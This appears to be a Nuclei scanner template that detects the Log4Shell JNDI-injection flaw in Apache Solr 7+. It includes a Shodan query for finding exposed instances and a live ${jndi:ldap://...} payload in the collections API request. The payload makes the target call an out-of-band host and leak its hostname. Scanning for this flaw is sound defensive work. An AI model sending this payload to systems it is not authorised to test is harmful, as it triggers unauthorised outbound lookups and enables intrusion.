id: solr-log4j-rce

info:
  name: Apache Solr 7+ - Log4j Remote Code Execution
  author: Evan Rubinstein,nvn1729
  severity: critical
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
  reference:
    - https://github.com/projectdiscovery/nuclei-templates/blob/c8d2139e545775c34f5fb9e93d0da7a9d9aef0bd/vulnerabilities/apache/apache-solr-log4j-rce.yaml
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  metadata:
    verified: true
    shodan-query: http.html:"Apache Solr"
  tags: cve,cve2021,solr,oast,log4j,rce,apache,jndi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/05/27